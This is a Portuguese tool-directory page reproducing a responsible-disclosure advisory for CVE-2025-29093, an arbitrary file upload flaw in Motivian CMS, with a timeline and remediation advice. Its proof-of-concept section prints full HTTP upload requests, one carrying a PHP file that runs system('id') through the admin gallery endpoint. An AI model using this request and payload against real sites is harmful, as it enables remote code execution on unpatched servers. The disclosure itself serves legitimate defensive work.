Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29093-Arbitrary-File-Upload — Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0 | Kitploit
Ferramentas/GitHubGitHub/framarcuccio/cve-2025-29093-arbitrary-file-upload
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubframarcuccio/cve-2025-29093-arbitrary-file-upload

CVE-2025-29093-Arbitrary-File-Upload

Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 6 mesesAinda não revisado

CVE-2025-29093-Upload-Arbitrário-de-Arquivo

Este repositório revela uma vulnerabilidade de segurança descoberta no Motivian Content Management System v.41.0.0.

  • CVE-2025-29093: Upload Arbitrário de Arquivo

Esta vulnerabilidade foi reportada ao fornecedor de acordo com práticas de divulgação responsável, e ao MITRE, que atribuiu um ID CVE temporário. Os detalhes estão sendo tornados públicos após o término do período de divulgação de 45 dias.

Informações Gerais

| Título: | Motivian Upload Arbitrário de Arquivo | | Tipo de Vulnerabilidade: | Upload Arbitrário de Arquivo | | Fornecedor do Produto: | Motivian | | Produto: | Motivian Content Management System | | Versão Afetada: | Motivian CMS v.41.0.0 | | Componente Afetado: | Content/Gallery/Images | | Vetor de Ataque: | Remoto | | Impacto: | Upload malicioso arbitrário de arquivo | | Severidade: | Médio | | Pontuação CVSSv3: | 6.5 | | Vetor CVSSv3: | CVSS:3.1:AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N | | Severidade por CISA-ADP: | Alto | | Pontuação CVSSv3 por CISA-ADP: | 8.2 | | Vetor CVSSv3 por CISA-ADP: | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N | | Descoberta em: | 2025-02-03 | | Por: | Francesco Marcuccio | | Status: | Reportado ao fornecedor em 7 de abril de 2025 - Nenhuma resposta/correção recebida até 22 de maio de 2025 |

Descrição

Uma vulnerabilidade de Upload de Arquivo no Motivian Content Management System v.41.0.0 permite que um atacante remoto faça upload de arquivos arbitrários com extensões manipuladas (ex.: .php, .png, .txt) contendo código malicioso, através do componente Content/Gallery/Images.

Prova de Conceito

A vulnerabilidade pode ser explorada ao fazer upload de arquivos com várias extensões. Para fins de demonstração, dois casos de prova de conceito foram usados: um envolvendo um arquivo .php contendo código malicioso, e outro usando um arquivo .txt com a string de teste EICAR. Ambos os arquivos foram carregados através do componente Content/Gallery/Images.

Abaixo está a transcrição completa das requisições e respostas HTTP usadas para demonstrar o problema:

Requisição Burp EICAR

root@kitploit:~
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"

-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"

M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--

Requisição Burp PHP

root@kitploit:~
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"

304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"

77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream

<?php 
echo system('id'); 
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--

Resposta Burp

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729

Remediação

Não permita que usuários façam upload de arquivos arbitrários. Implemente validação rigorosa de arquivos (inspeção de tipo MIME e conteúdo), randomize nomes de arquivos e restrinja diretórios de upload.

Cronograma de Divulgação

DataAção
2025-02-06Solicitação de ID CVE (CNA: MITRE)

Créditos

  • Descoberta e divulgada de forma responsável por:
    Francesco Marcuccio
    Consultor de Segurança Cibernética, Penetration Tester

  • Atribuição do descobridor no MITRE listado como:
    Francesco Marcuccio
    Consultor de Segurança Cibernética, Penetration Tester

Links

Links de referência: MITRE NIST

Status

Este ID CVE está oficialmente no status PUBLICADO. Será atualizado com pontuação CVSS pelo NIST, após análise.

Baixar ferramenta
2025-04-02
Atribuição de ID CVE
2025-04-07Vulnerabilidades reportadas ao fornecedor
2025-05-31Divulgação pública após o término do período de divulgação de 45 dias (54 dias no total)
2025-06-04Registro oficial e entrada no banco de dados MITRE e portal NIST/NVD